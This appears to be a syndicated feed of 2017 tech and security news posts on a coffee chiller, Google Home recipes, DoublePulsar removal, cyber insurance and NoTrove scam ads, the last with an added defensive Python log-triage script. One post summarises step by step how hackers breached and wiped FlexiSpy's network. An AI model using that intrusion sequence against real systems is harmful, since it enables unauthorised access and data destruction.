As I’ve said many times, iced coffee is a brilliant way to sell people ice for the price of coffee (which is mostly water to begin with). Cold brew on the other hand is a different process that results in less acidity, among other benefits. The HyperChiller might not make cold brew, but it’s dead simple and works with the brewing gear you already own to rapidly chill your coffee.
You can pour or brew your coffee (or alcohol) directly into the HyperChiller, which surrounds your beverage of choice with ice-filled stainless steel. This process drops the temperature of your drink by more than 130 degrees in under a minute. No dilution. No effort. No coffee shop markup. Dishwasher safe.
Want to make cold brew? That’s easy too:
from Lifehacker http://ift.tt/2pb5ryp
Google Home Will Now Read Cooking Directions Out Loud
When it comes to home voice assistants, there’s no denying that the bulk of their usage comes in the kitchen for setting timers and playing audio. Google’s taking that to the next logical step with Google Home, which can now read recipes out loud.
Here’s how it works:
- Pick a recipe using the Google Assistant on Android or Google Search (which is now just called Google) app (on iOS or Android).
- Tap the “Send to Google Home” button when you find a recipe you want to make.
- When you’re ready to start cooking, say, “Ok Google, start cooking.”
- When you’re ready for the next step, say, “Ok Google, what’s step two,” or if you need to repeat something, say, “Ok Google, repeat.”
The idea here is pretty great, but it’s hard to tell how well it’ll actually work in real time. It’s also a bit frustrating that you can only send recipes using Google’s own apps, which limits your selection, and it doesn’t appear there’s any means to actually save and recall recipes. Either way, it’s still a step in an interesting direction. As with all Google things, this will be rolling out over the next week or so, so if it’s not working for you right now, try it again later.
Now we’re cooking — the Assistant on Google Home is your secret ingredient | Google
from Lifehacker http://ift.tt/2p4nHuF
Hackers explain how they “owned” FlexiSpy
How did the hackers that go by the name Decepticons breach stalkerware manufacturer FlexiSpy?
According to information purportedly provided by the attackers themselves, it took them a while to thoroughly “own” the company’s networks and wreak as much havoc as possible, but it was ultimately not that difficult.
What is FlexiSpy?
FlexiSpy is a piece of spyware that can be deployed on a variety of devices running Windows, macOS, iOS and Android.
It can record calls, steal application passwords, listen in on chats conducted via popular social networking and instant messaging apps, monitor the victim’s web surfing, snap pictures with the device’s camera, send fake SMSes, track the device’s location, and more.
The company says it is meant to help parents keep an eye on children and employers on employees, but analysis of the documents stolen by the hackers revealed that the company has also been marketing the spyware to people who wanted to monitor their significant other’s online activities and digital communications.
The attackers’ motivation
Motherboard reporters talked to “Leopard Boy”, a member of the Decepticons, and another anonymous hacker who breached American company Retina-X at practically the same time the Decepticons went after FlexiSpy. (Retina-X develops and sells PhoneSheriff, another piece of consumer surveillance software.)
Both said that what they wanted to achieve with their destructive breaches was to put the companies out of business.
The FlexiSpy hack
The Decepticons published a step-by-step overview of how they hit the company.
They started by enumerating the company’s IP space with Fierce, and among the results they found a subdomain hosting an admin panel.
They tried to perform SQL injection on it, but failed. Then they tried some common default credential combinations and struck gold. Once inside, they managed to enumerate and extract info on the company’s customers.
Then they set out to find servers and websites run by the company, and found SSH servers, a Microsoft Exchange server, a CRM instance, etc. They also found a software repository, a Mailchimp API key, and a password that allowed them to compromise an administrator account on the CRM instance, from which they proxied onto FlexiSpy’s internal network and began scanning for open ports.
They say that they managed to compromise the company’s NAS servers, which contained source code backups and backups of “home directories, HR documents, corporate files, some SSH keys, password backups, internal network diagrams.”
They accessed and compromised the Domain Controller for all of the Windows domains, the internal SharePoint server, and started exfiltrating every kind of information and code they could – then handed much of it over to Motherboard reporters.
Then they set about destroying and wiping everything: the company’s RAID devices, NAS devices, Rackspace servers, and Amazon S3 buckets of backups. Finally, they said that they redirected the company’s domains to Privacy International and hijacked a couple of its Twitter accounts.
“We’ve stolen a great deal of source code, going back years. We are hoping that signatures are going to be distributed, tools written to identify and remove infections, and we also hope that people will see that this industry is really out there, is worth money, and that it’s terribly, terribly evil,” they concluded.
The company’s domains are now back online, and the company did not confirm or deny the breach. Instead, it only apologized to users about a “temporary technical issue affecting the portal” on April 18, and announced a “Hacker Reward Program” on April 24.
Similarly, Retina-X did not mention a breach to its customers, and apparently instructed its staff to say that a hardware failure was behind a recent outage that prevented customers from logging into their accounts.
from Help Net Security http://ift.tt/2oJBtQ9
Deadspin ESPN Officially Announces Layoffs, Says Very Little Else | Jezebel Serena Williams Says Her Pregnancy Announcement Was a Social Media Slip | The Root What’s Up With Oprah And Homophobic Preachers? | Fusion Charlotte Cops Think This Video Showing Officers Threatening to Kill an Unarmed Man Is Just Fine |
from Lifehacker http://ift.tt/2oM2uTK
Script for remote DoublePulsar backdoor removal available
NSA’s DoublePulsar backdoor can now be remotely uninstalled from any infected Windows machine, thanks to the updated detection script provided by security firm Countercept.
“The SMB version [of the script] also supports the remote uninstall of the implant for remediation, which was helped by knowledge of the opcode mechanism reversed by @zerosum0x0,” the company explained.
It’s good to note, though, that using it to “clean” machines you don’t own is not advised, as it’s technically against the law in most countries to tamper with other people’s computers. Still, it can come in handy for administrators who are tasked with checking and securing a considerable number of systems.
Also, it’s good to remember that removing the backdoor is as easy as restarting the infected machine, although that won’t prevent it from being infected again in the same way as before. Installing the patch provided by Microsoft in March will help.
Microsoft’s reaction
According to Ars Technica, Microsoft is still not convinced that the number of machines implanted with DoublePulsar is as big as it has been reported – i.e. in the tens of thousands.
And that number seems to keep rising, as script kiddies and more knowledgeable cyber criminals are taking advantage of the NSA attack tools and exploits leaked by the Shadow Brokers, and the “tutorials, taken from security researchers, on how to utilize the exploits and the Equation Group’s self-developed framework, called Fuzzbunch.”
EternalBlue, the exploit used to deliver DoublePulsar, is capable of penetrating machines running unpatched Windows XP through 2008 R2 by exploiting vulnerabilities in Microsoft Windows SMB Server.
“Customers with up-to-date software are protected from this malware, which requires an already-compromised machine to run,” Microsoft stated. “We encourage customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers.”
from Help Net Security http://ift.tt/2ovQpWK
Analyzing Cyber Insurance Policies
There's a really interesting new paper analyzing over 100 different cyber insurance policies. From the abstract:
In this research paper, we seek to answer fundamental questions concerning the current state of the cyber insurance market. Specifically, by collecting over 100 full insurance policies, we examine the composition and variation across three primary components: The coverage and exclusions of first and third party losses which define what is and is not covered; The security application questionnaires which are used to help assess an applicant's security posture; and the rate schedules which define the algorithms used to compute premiums.
Overall, our research shows a much greater consistency among loss coverage and exclusions of insurance policies than is often assumed. For example, after examining only 5 policies, all coverage topics were identified, while it took only 13 policies to capture all exclusion topics. However, while each policy may include commonly covered losses or exclusions, there was often additional language further describing exceptions, conditions, or limits to the coverage. The application questionnaires provide insights into the security technologies and management practices that are (and are not) examined by carriers. For example, our analysis identified four main topic areas: Organizational, Technical, Policies and Procedures, and Legal and Compliance. Despite these sometimes lengthy questionnaires, however, there still appeared to be relevant gaps. For instance, information about the security posture of third-party service and supply chain providers is notoriously difficult to assess properly (despite numerous breaches occurring from such compromise).
In regard to the rate schedules, we found a surprising variation in the sophistication of the equations and metrics used to price premiums. Many policies examined used a very simple, flat rate pricing (based simply on expected loss), while others incorporated more parameters such as the firm's asset value (or firm revenue), or standard insurance metrics (e.g. limits, retention, coinsurance), and industry type. More sophisticated policies also included information on specific information security controls and practices as collected from the security questionnaires. By examining these components of insurance contracts, we hope to provide the first-ever insights into how insurance carriers understand and price cyber risks.
from Schneier on Security http://ift.tt/2qdHLsn
NoTrove threat actor delivering millions of scam ads
Researchers at RiskIQ have identified NoTrove, a threat actor that is delivering millions of scam ads that threaten consumers and further undermine the digital advertising industry. NoTrove was so effective that one of its pages ranked as one of the internet’s most visited pages for one day.
Earliest observed instance of NoTrove
The online ad scams work by serving up attractive but disingenuous ads on legitimate websites. The ads might offer bogus surveys or free software upgrades, as examples. When someone clicks on the ad, however, the scammer’s software then re-directs the user’s “clicks” and traffic toward various locations across the Internet.
Since advertisers and web content providers want as much of the traffic pie as they can get, web traffic is an essential commodity. Ad scammers like NoTrove profit from this demand, participating in traffic affiliate programs or selling traffic to traffic buyers (brokers). Unfortunately for the digital advertisers, however, the users are negatively impacted. They are surprised by the ad they are seeing and don’t even know how they got it.
Equally troubling for the digital advertising industry is that as ad scammers increase, the likelihood consumers will implement ad blockers as a way to avoid bogus ads increases as well. This practice, according to Juniper Research, will cost the digital media industry over $27 billion by 2020.
For consumers, this is more than just a nuisance. Ad scams can also be used to download PUPs—potentially unwanted programs—and can redirect them to unwanted places.
How NoTrove works
- To stay ahead of efforts to block its fake ads, NoTrove uses automation to constantly change how the ads are delivered and clickthroughs re-routed.
- The scam master has burned through 2,000 randomly generated domains and more than 3,000 IPs, operating across millions of Fully Qualified Domain Names; an FQDN is a complete web address, typically including subdomains for ad scammers, such as ajee99.mycontent.example.com.
- RiskIQ observed 78 variants of NoTrove campaigns, such as scam survey rewards, fake software downloads, and redirections to PUPs.
- Alexa rankings for its domains show how effective NoTrove is; even though each domain is short-lived, the rankings often shoot up into the Alexa top 10,000 based purely on scam ad deliveries; one NoTrove domain reached the ranking of 517, making it one of the most visited pages on the entire internet for that day.
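The churn in the list above (thousands of throwaway domains, millions of FQDNs with random leftmost labels, clicks answered with redirects) is exactly what per-domain blocklists lag behind. As an added example, not RiskIQ’s code or anything from the original article, the script below scores each registrable domain in a few constructed proxy-log lines by distinct subdomain count, leftmost-label entropy and redirect share; the log format, the thresholds and the two-label apex rule are assumptions.

```python
"""Heuristic triage of scam-ad style infrastructure in web proxy logs (added example)."""
import math
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple


class DomainStats(NamedTuple):
    apex: str
    distinct_subdomains: int
    mean_label_entropy: float
    redirect_ratio: float
    suspicious: bool


# Constructed sample: "<epoch> <client_ip> <host> <http_status>", one request per line.
# The first apex mimics the page's ajee99.mycontent.example.com pattern; the second is benign.
SAMPLE_LOG = """\
1493000001 10.0.0.5 ajee99.mycontent.example.com 302
1493000002 10.0.0.7 qx7v2k.mycontent.example.com 302
1493000003 10.0.0.5 zp0r8t.mycontent.example.com 302
1493000004 10.0.0.9 m3kd91.mycontent.example.com 302
1493000005 10.0.0.5 b8x2qq.mycontent.example.com 302
1493000006 10.0.0.5 www.example.org 200
1493000007 10.0.0.7 cdn.example.org 200
1493000008 10.0.0.9 www.example.org 200
"""


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label; generated labels score high."""
    if not label:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in label.lower():
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_host(host: str) -> Tuple[str, str]:
    """Return (apex, subdomain). Assumption: the apex is the last two labels;
    production code should consult the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_log(text: str) -> List[Tuple[int, str, str, int]]:
    """Parse the constructed 4-field format, silently skipping malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit() or not parts[3].isdigit():
            continue
        rows.append((int(parts[0]), parts[1], parts[2], int(parts[3])))
    return rows


def score_domains(rows, min_distinct: int = 4, min_entropy: float = 2.0) -> Dict[str, DomainStats]:
    """Aggregate per apex: how many distinct subdomains, how random their leftmost label
    looks, and what share of requests were redirects (assumed thresholds flag candidates)."""
    subs: Dict[str, set] = defaultdict(set)
    hits: Dict[str, int] = defaultdict(int)
    redirects: Dict[str, int] = defaultdict(int)
    for _ts, _client, host, status in rows:
        apex, sub = split_host(host)
        if sub:
            subs[apex].add(sub)
        hits[apex] += 1
        if 300 <= status < 400:
            redirects[apex] += 1
    out: Dict[str, DomainStats] = {}
    for apex, total in hits.items():
        leftmost = [s.split(".")[0] for s in subs[apex]]
        mean_h = sum(label_entropy(l) for l in leftmost) / len(leftmost) if leftmost else 0.0
        flagged = len(subs[apex]) >= min_distinct and mean_h >= min_entropy
        out[apex] = DomainStats(apex, len(subs[apex]), round(mean_h, 3),
                                round(redirects[apex] / total, 3), flagged)
    return out


if __name__ == "__main__":
    for stats in score_domains(parse_log(SAMPLE_LOG)).values():
        print(stats)
```

Feed it a real proxy export in the same four-field shape and raise the thresholds to match your traffic volume; the flagged apexes are candidates for analyst review, not an automatic block decision.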
“NoTrove harms not only visiting users, but also legitimate advertisers, adversely affecting those reliant on the credibility of the digital advertising ecosystem, such as online retailers, publishers and networks,” said William MacArthur, a threat researcher at RiskIQ. “Constantly shifting infrastructure means simply blocking domains and IPs isn’t enough. We must now begin utilizing machine learning to leverage human security teams who increasingly depend on accurate, automated scam detection.”
from Help Net Security http://ift.tt/2ovhzgu